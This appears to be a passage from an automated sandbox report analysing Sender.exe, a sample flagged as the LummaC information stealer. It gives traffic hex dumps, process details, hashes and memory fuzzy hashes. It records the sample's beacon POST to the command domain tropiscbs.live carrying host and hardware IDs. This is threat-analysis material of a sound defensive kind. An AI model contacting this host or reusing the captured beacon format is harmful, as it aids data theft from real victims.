                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: 68 3b bf 0d e5 82 a8 c4 e9 81 b9 6b d2 64 69 e5 cc 98 8e 0c 2f 80 2b 86 bb b1 39 a6 30 21 48 6a 56 b3 5d 20 ba db 41 bf 99 33 f0 27 98 cd c2 2e fd 07 68 c0 df 59 e4 c1 25 43 e8 20 1f c2 7e 7c 43 4a eb b7 38 45 ac a2 a7 78 c1 32 62 66 11 88 82 13 30 f4 17 c2 f0 30 b3 03 fb b7 df 0c 3c 4f 9b b4 d9 33 3d 35 71 5c d6 41 18 66 bd e0 fc 4a 07 61 1d 2a 0d 9c 49 06 82 36 67 d6 1d 6f 33 57 ec 17 5b 1f bb ff 60 54 0f 49 4f f6 10 a8 87 f4 13 06 a8 2a b9 64 31 63 44 19 05 4a 77 6b 65 e4 57 c1 1b 16 e8 7e 03 7e 02 6b 65 fd 39 75 b0 c7 74 08 72 90 0e 0c bc 6b d8 20 5d ec 63 0c 06 f9 aa 97 9e 36 4b 7a ad 51 30 53 d7 f8 17 3a e3 4b 55 da de 7f ac e1 47 34 47 b8 12 cb 92 50 ae 9e db 32 ad 64 1a 8f f4 a7 12 49 3c 16 8f 89 58 82 ec 56 91 f1 ab 04 e1 c1 5d 97 0a a4 4f cb a0
                                                                      Data Ascii: h;kdi/+90!HjV] A3'.hY%C ~|CJ8Ex2bf00<O3=5q\AfJa*I6go3W[`TIO*d1cDJwkeW~~ke9utrk ]c6KzQ0S:KUG4GP2dI<XV]O
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: b3 e9 68 35 dd 79 73 3e fe 73 15 c9 44 12 8a c6 f7 59 91 7c 6d 11 96 c9 46 5b 2d 2f f5 06 1c 46 58 93 3f 89 e5 40 02 1a fc 14 03 6d 62 d7 40 6a 4e 4b 9e 78 dc 64 19 e9 49 b2 da d1 26 cf 4e 11 07 ac 1f 1a 9f 50 0a 19 62 79 dd ba 2f 09 cc 1c 69 09 2d d8 10 8b 77 ee 6a 19 fc e0 bd 20 1a 21 65 e1 d8 13 68 48 0b 6f 6e ed d2 05 9a ab f4 f4 f4 23 3e 4d b1 9c 2d b7 9e c2 85 10 e2 20 ae 39 17 9d 1e 70 a1 c7 3f 92 22 46 c9 42 f8 d7 01 c3 5e 08 67 47 ee 4a 83 f9 6d cb 99 76 e6 c6 d0 bf 97 43 e1 00 22 0e 70 58 e3 b4 70 7a ec 41 40 18 9e 0e 8d 9a a2 60 15 bf 16 f2 af 27 2f 39 95 e2 85 ce 0d c1 f5 41 ae 46 41 62 5f 97 b6 60 38 11 87 3f 2c f1 5c 68 bc a8 7f 23 62 be b6 23 71 cf 6f e1 b7 d1 1f 5f bf 2d 99 a9 f2 ca 9d f4 1b 0a 5d c5 5d 69 0f ed 55 14 de d3 72 b8 7a 59 1f
                                                                      Data Ascii: h5ys>sDY|mF[-/FX?@mb@jNKxdI&NPby/i-wj !ehHon#>M- 9p?"FB^gGJmvC"pXpzA@`'/9AFAb_`8?,\h#b#qo_-]]iUrzY
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: 6f 2d f6 56 b5 9c 8f 21 83 08 45 e8 d0 3c ba 37 89 1f 4b a3 9a 7a 0e 37 f1 f8 ed 8e 4a ba 29 74 4f 89 f6 51 66 55 93 ee 8f e4 b4 ef 23 ca 01 9c 74 42 37 b2 4d 79 fc ac b0 af ca 41 b3 b5 84 77 fd 12 1e 30 15 12 ea 8c e4 b4 04 09 4f b2 4b f6 e4 56 9d 0b a7 ac 19 79 4e 4d 29 1e 48 37 93 00 ae fb 14 38 a4 9e bb 6d 52 5d 0a 82 2c 71 0b 42 b2 07 0a f6 ca 4a 31 9b 3e 3f f6 8f 2d 78 64 a9 c3 e9 1e 65 d4 05 6c c0 4b 6e c2 ad 47 0a 59 e6 2d 0a 3f 68 da 3d d4 0c 90 2f fe b9 1d ed fc 83 bc 67 d8 fb 0c 7b 0a b0 3f 5d ad d5 cb 33 58 f8 80 ca a2 11 55 99 b5 59 82 7d 2a 6b 08 f5 21 54 2a d1 06 f7 b7 02 ef c8 c0 de e3 9c 1b cc 8c be 9c 78 42 1c 4f e5 e1 59 45 54 af 9b a1 4f 9c 11 1c 65 28 83 1e 2d 00 41 6b 4c fe 8a 5e 2a 23 9f 65 1a 3d 5e 14 29 06 b6 3f 14 d8 e0 47 e0 57
                                                                      Data Ascii: o-V!E<7Kz7J)tOQfU#tB7MyAw0OKVyNM)H78mR],qBJ1>?-xdelKnGY-?h=/g{?]3XUY}*k!T*xBOYETOe(-AkL^*#e=^)?GW
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: 86 8b da 90 13 32 ed 16 03 be 3a 74 7f f4 0f 0e c1 20 08 b8 63 3b 99 7f 9e 1a f4 f7 03 80 ae 7d f2 0c d2 48 a9 20 f7 b7 a8 2d 31 c5 a3 56 46 04 fc 8f 25 31 0a a0 64 f2 51 83 c0 10 03 2e e1 f4 00 44 44 e8 6e 70 0b 55 ae 5f 24 3d 0a 59 e2 a7 68 da 57 83 14 d6 68 dc aa 99 db ec 06 72 98 e6 52 92 e0 09 68 8c 7a 22 3f ae 4c c2 02 89 07 6a 92 0f 6a dc 99 6f 51 06 55 7e f9 c1 21 d7 bf de ee 73 99 fa 30 c7 92 8c 0b 0e 31 1e 24 58 9b 93 cf 9b 5a a2 79 ab a6 4e 1a 37 67 0a 3b 0a ef db 3f 2f 45 e4 f7 11 3f 16 71 ec 03 bc 2f 48 55 09 3a 8d 00 fd 2d d2 a1 a5 5e c2 d3 80 9e 71 c0 94 8e 81 bb be 0b 26 cf 4a 40 c0 b1 2f fb 10 c5 8f c2 b5 a9 b1 a1 97 b1 08 dc 6a c2 1c 99 07 c9 33 00 7c 92 62 61 da d5 d2 59 76 1c 36 ff 39 89 52 01 f2 0c b7 56 95 86 bf 90 7b ef 38 15 9c bf
                                                                      Data Ascii: 2:t c;}H -1VF%1dQ.DDnpU_$=YhWhrRhz"?LjjoQU~!s01$XZyN7g;?/E?q/HU:-^q&J@/j3|baYv69RV{8
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: e6 4c b7 48 98 0c 3b 93 04 2d 2e 0d 22 f8 07 b0 bc b0 0e e5 67 bc 3c 2b 30 1f 11 e4 47 64 6e f5 f7 d3 a4 1a 64 49 3d 34 24 1d 64 23 24 8f 88 4b 93 50 5b b9 12 2a 31 52 e7 e2 22 18 af 41 49 af 36 a3 69 b4 e5 77 fc 6c ba b8 77 2c 42 7c ac 05 02 46 d8 64 a2 25 95 01 8c 8f 6b fb 5d 4e 69 c7 30 c6 83 59 d2 7d 9d 48 7f 84 f7 9a 68 ee 3d 5c 71 e8 19 79 e7 d4 7c d1 87 66 50 28 53 f6 47 3e 6f 60 d0 86 be aa 9f 75 62 8e fe 1e 14 8f 97 4f ba 94 95 24 87 ba b5 92 28 b4 59 90 01 7f be a0 58 be 41 f5 bf 36 16 7b 33 64 4d 2b 41 dc 9a 70 71 65 28 f3 ae 74 0f 7b 45 c9 a8 d3 15 c5 19 22 30 05 ce 05 10 6f 58 59 8e 07 9d eb 61 ef aa a4 93 bc 4f 06 77 43 21 ec 3f 21 8e d4 13 54 f5 42 80 29 d7 2d 1d 3a ce 1c a4 68 38 ab 12 93 79 aa 86 51 45 b4 14 71 43 51 08 93 be 8f 41 07 e9
                                                                      Data Ascii: LH;-."g<+0GdndI=4$d#$KP[*1R"AI6iwlw,B|Fd%k]Ni0Y}Hh=\qy|fP(SG>o`ubO$(YXA6{3dM+Apqe(t{E"0oXYaOwC!?!TB)-:h8yQEqCQA
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: 0f ff 72 c9 9b c3 2b 11 6d fe 78 5f 25 77 26 44 5e b2 90 5b b3 2b 33 dd 9c 72 de 66 bf 08 e4 42 51 5e e4 67 38 2e 10 89 00 78 f3 41 16 47 ac dd 20 8f 78 ed ae f6 2d 16 61 82 ed 75 8a dc de 50 62 d9 bb 76 02 63 9f 84 59 31 de 38 ca 7c 80 f1 17 2e e7 db 1c 33 0b d0 b3 6e 5d b4 47 69 4c 86 c7 51 83 10 a7 58 4f a5 0e 68 ad 5a 8f ea 47 97 6c e7 30 38 08 29 ef 05 88 52 48 2b 78 0f 85 a7 3c 86 e5 96 51 02 ba fe 6c 3d e1 8e 0e 7c a5 d3 d4 00 a2 46 32 df 42 03 1d 32 69 47 d3 6b 67 a2 70 75 08 f7 e0 1a 99 68 63 2a e2 95 42 90 c0 f0 52 02 b2 64 96 de 07 65 dc 32 cd b4 b2 a9 33 b7 1b 69 f0 39 aa 24 eb 44 c4 80 60 1f 5e e3 3e b1 f0 e3 c2 7f 35 c4 fb 4d d4 2d c7 4f fa d1 03 2b 88 8b 71 0c 2c aa 49 c8 a6 c0 f6 14 54 27 9f aa 01 03 a4 38 c5 c0 bf 5b 6b 9e cf d4 2a a9 19
                                                                      Data Ascii: r+mx_%w&D^[+3rfBQ^g8.xAG x-auPbvcY18|.3n]GiLQXOhZGl08)RH+x<Ql=|F2B2iGkgpuhc*BRde23i9$D`^>5M-O+q,IT'8[k*
                                                                      2025-04-27 16:36:41 UTC | 15331 | OUT | Data Raw: b8 b9 98 44 1a 60 63 a4 1e fe a5 1f 0d f4 cd 3c da f5 c7 a1 b7 d6 54 7a da 95 7f 2d 1c f0 39 c3 6e d6 0b 84 fb 8c 56 f8 9b 22 52 c9 77 99 8a cf 6d de 21 4c ea b6 d1 2b d9 3c 5b da 68 cd 9c e6 a1 7a d5 7e f2 07 ec 99 c5 d6 6b 48 45 f9 04 c2 94 34 1d f8 b2 f5 82 a7 bd ac 2b 08 11 b3 ac e2 2a f1 fc a2 4a 86 65 e0 d4 d6 8c ac 4c 65 3a d3 68 52 f6 7c c4 45 e7 e5 b5 c6 6b e2 27 21 b7 e8 32 59 6e bb 6b 3a e1 ea d4 12 02 68 2b e3 0f 53 2b 04 b0 7c 07 75 56 45 48 47 bf 46 c7 ad 58 70 71 a0 a3 44 78 bc 43 26 52 87 f5 3a 06 49 1f d4 c1 9c 23 c7 ba fe aa d0 6e 10 10 3d de a5 18 37 31 69 13 20 5a 24 b7 61 de f8 04 a7 cd 08 53 7c eb 7b c2 a4 65 14 ab b0 de 2a ff 7e 96 91 a8 9c 76 46 2c 18 81 09 44 86 e1 86 28 9f ed 29 9a 81 bb b9 ce 2e 48 04 5a 01 c9 09 65 85 63 7d 62
                                                                      Data Ascii: D`c<Tz-9nV"Rwm!L+<[hz~kHE4+*JeLe:hR|Ek'!2Ynk:h+S+|uVEHGFXpqDxC&R:I#n=71i Z$aS|{e*~vF,D().HZec}b
                                                                      2025-04-27 16:36:44 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:44 GMT
                                                                      Content-Type: application/json
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Vary: Accept-Encoding
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd80d8eb5233-LAX
                                                                      alt-svc: h3=":443"; ma=86400


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.4 | 49721 | 104.21.77.203 | 443 | 4768 | C:\Users\user\Desktop\Sender.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2025-04-27 16:36:44 UTC | 264 | OUT | POST /iuwxx HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                      Content-Length: 79
                                                                      Host: tropiscbs.live
                                                                      2025-04-27 16:36:44 UTC | 79 | OUT | Data Raw: 75 69 64 3d 31 32 64 38 39 38 37 34 30 63 31 31 34 36 34 39 32 30 31 62 66 32 66 31 66 31 37 66 39 36 66 30 26 63 69 64 3d 26 68 77 69 64 3d 30 42 44 39 30 44 34 38 38 37 44 44 46 35 35 45 36 42 38 35 39 30 46 43 33 43 45 46 30 33 46 37
                                                                      Data Ascii: uid=12d898740c114649201bf2f1f17f96f0&cid=&hwid=0BD90D4887DDF55E6B8590FC3CEF03F7
                                                                      2025-04-27 16:36:45 UTC | 241 | IN | HTTP/1.1 200 OK
                                                                      Date: Sun, 27 Apr 2025 16:36:45 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 43
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Cf-Cache-Status: DYNAMIC
                                                                      CF-RAY: 936fbd951ba0f20a-LAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-04-27 16:36:45 UTC | 43 | IN | Data Raw: ba fa 20 8d ed e9 b5 a2 c8 39 fb 76 65 65 9b b3 7e f7 91 7c 9f 38 a4 35 4c b5 61 13 fa 40 af 93 71 3a ff cf 78 82 22 1e 6c bd 66
                                                                      Data Ascii: 9vee~|85La@q:x"lf


                                                                      [CPU usage over time graph: x-axis 0-100 s, y-axis 0-100]

                                                                      [Memory usage over time graph: x-axis 0-100 s, y-axis 0-20 MB]

                                                                      [Process behavior distribution chart: File, Registry]

                                                                      Target ID:0
                                                                      Start time:12:36:30
                                                                      Start date:27/04/2025
                                                                      Path:C:\Users\user\Desktop\Sender.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Sender.exe"
                                                                      Imagebase:0xa00000
                                                                      File size:169'472 bytes
                                                                      MD5 hash:39E94524E19C217D1F19208A42A12947
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Non-executed Functions

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1278664144.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006E7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6e7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f
                                                                      • API String ID: 0-1993550816
                                                                      • Opcode ID: f1d87a2891968507f6f54c2c8887fe7d1cb44da55dfb688157f916d044aa1fba
                                                                      • Instruction ID: 10033a942e97220c9aea79f651d9428e4ad5a8e98ddf67a4f478134249277219
                                                                      • Opcode Fuzzy Hash: f1d87a2891968507f6f54c2c8887fe7d1cb44da55dfb688157f916d044aa1fba
                                                                      • Instruction Fuzzy Hash: 3471BF2640E3C19FC7138F30D966692BFB2AF07314B1A85CED4C18B5A7C369690AD762
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: l
                                                                      • API String ID: 0-2517025534
                                                                      • Opcode ID: f4e2a374e378c871f2cbb428243542505db6a4204eef6f162498f259c897ee16
                                                                      • Instruction ID: 62dd0988643dc2b9e3a9c33ea479173a5a62526d55b1c461376cfeee2750fc35
                                                                      • Opcode Fuzzy Hash: f4e2a374e378c871f2cbb428243542505db6a4204eef6f162498f259c897ee16
                                                                      • Instruction Fuzzy Hash: 6C222FA640E7C04FD74387B49CAA7917FB1AF17104B0E86EBC4C4CF5A3D619681AE762
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a223ff0e41d9bb7b8c83598273b241f90b61099ff8ba03b314430f8af0a29e0a
                                                                      • Instruction ID: 456d3aa8c0aceb4ad59ce66fdf8b7c00ec875d3e31abaa1456d52ca19ee815fc
                                                                      • Opcode Fuzzy Hash: a223ff0e41d9bb7b8c83598273b241f90b61099ff8ba03b314430f8af0a29e0a
                                                                      • Instruction Fuzzy Hash: 96C1309644E7C04FD30387B49C667917FB1AF27205B0E86EBC4C5CF5A3E619681AE722
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9bba165ce8443d05ad325b825f7a5a2ad79f5f1dada144152ce4074dfbdc0510
                                                                      • Instruction ID: 988d8aee44ef83f0c227e2ad85497d1b8224b96431ed6ca1b4a32866f0752b8d
                                                                      • Opcode Fuzzy Hash: 9bba165ce8443d05ad325b825f7a5a2ad79f5f1dada144152ce4074dfbdc0510
                                                                      • Instruction Fuzzy Hash: E7B130A684EBC44FD31387749C66A617FB1AF63208B0E85DBC4C0CF5E3E259580AD762
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Offset: 006C7000, based on PE: false
                                                                      • Associated: 00000000.00000003.1231928115.00000000006C7000.00000004.00000020.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6c7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d56581a7c0867e71e2b3de01a2758c3711edc398a198fe232008a3126cfad63f
                                                                      • Instruction ID: c2414860b8a056e5a6302edde12ff28e35b3af9e252c619b4dad89dfd4dff1c1
                                                                      • Opcode Fuzzy Hash: d56581a7c0867e71e2b3de01a2758c3711edc398a198fe232008a3126cfad63f
                                                                      • Instruction Fuzzy Hash: BF51E22240A3D49FC7178F70D921682BFB1AF47310B2E45CFD4C19F663D2A5A90AC792
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000003.1278664144.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 006E7000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_3_6e7000_Sender.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b3474120f3a6ade64f153a527afc7b4ab2da54460bda431084f8911e8948d15a
                                                                      • Instruction ID: e876eb3bba8052be7c667860a59a41b21e8ee4c405dd8c4cbfaa1d8dc72bef0a
                                                                      • Opcode Fuzzy Hash: b3474120f3a6ade64f153a527afc7b4ab2da54460bda431084f8911e8948d15a
                                                                      • Instruction Fuzzy Hash: C841F33600A3D49BCB26CF71C552683BFB6BF07310B2985CDD4C15B663C265A906CB91